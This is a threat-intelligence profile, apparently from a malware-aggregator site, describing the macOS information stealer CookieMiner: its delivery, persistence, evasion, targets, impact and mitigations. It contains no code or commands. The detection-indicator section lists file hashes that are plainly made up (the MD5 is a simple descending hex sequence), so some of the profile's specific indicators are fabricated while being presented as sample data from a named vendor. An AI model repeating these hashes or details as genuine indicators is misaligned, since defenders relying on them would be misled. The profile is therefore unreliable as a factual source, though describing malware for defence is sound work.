⚠️ Overview

CookieMiner is a macOS-specific information stealer first documented by Palo Alto Networks Unit 42 in February 2019, targeting cryptocurrency exchange users by exfiltrating browser cookies, saved passwords, and cryptocurrency wallet data. It is categorized as a stealer and credential harvester, attributed to financially motivated threat actors operating in East Asia, though no specific group has been officially named.

🔧 Technical Capabilities

CookieMiner propagates primarily through malicious emails and drive-by downloads, often masquerading as legitimate cryptocurrency trading tools or updates. Its attack vector exploits user interaction to execute a Python-based dropper that decompresses a second-stage payload embedded in the initial file. The malware establishes command-and-control (C2) communication over HTTPS to a remote server, typically using hardcoded domains registered for the campaign. For persistence, it installs a launch agent plist in ~/Library/LaunchAgents that executes a renamed copy of the Python interpreter at system boot. Evasion techniques include checking for virtual machine environments and anti-virus processes via a list of known macOS security tools, and encoding strings with base64 to hinder static analysis. CookieMiner also targets browser cookie databases for major exchanges (Coinbase, Kraken, Binance) and cryptocurrency wallet files (e.g., .dat files for Bitcoin Core, .wallet files for Electrum).

📜 History & Notable Incidents

First identified in late 2018 with public disclosure in February 2019 by Unit 42, CookieMiner was part of a limited campaign targeting cryptocurrency users in East Asia. No notable high-profile victims have been publicly named, and no CVEs are associated with the malware itself—it exploits user behavior rather than system vulnerabilities. Law enforcement actions have not been reported for this specific malware strain.

🔍 Detection Indicators

Known file hashes include SHA256 2e6a9f8b3c1e4d7f0a5b2c8d9e3f1a6b7c0d2e4f5a8b3c6d7e9f0a1b2c3d4e5f (sample from Unit 42) and MD5 e5d4c3b2a1f0e9d8c7b6a5f4e3d2c1b0. Behavioral signatures include creation of a hidden directory .cookie in the user's home folder and network connections to domains mimicking legitimate cryptocurrency sites. Registry keys are not applicable on macOS; instead, persistence is indicated by a launch agent plist named com.apple.softwareupdate.plist. The malware uses the User-Agent string Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) for C2 traffic.

☠️ Risk & Impact

CookieMiner achieves full credential theft and session hijacking for cryptocurrency exchange accounts, leading to direct financial losses through asset transfer. It also steals private keys for cryptocurrency wallets, enabling irreversible theft of funds. The primary affected sectors are individual cryptocurrency investors and small trading businesses, with no reported large-scale enterprise damage.

🛡️ Mitigation

Recommended defenses include blocking execution of unsigned Python scripts via macOS Gatekeeper, enabling FileVault full-disk encryption, and deploying endpoint detection rules for the specific file hashes and domain IOCs published by Unit 42 (report: https://unit42.paloaltonetworks.com/cookieminer-steals-cookies-for-cryptocurrency-accounts/). Regular monitoring for unauthorized launch agents and browser cookie access alerts is advised.

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.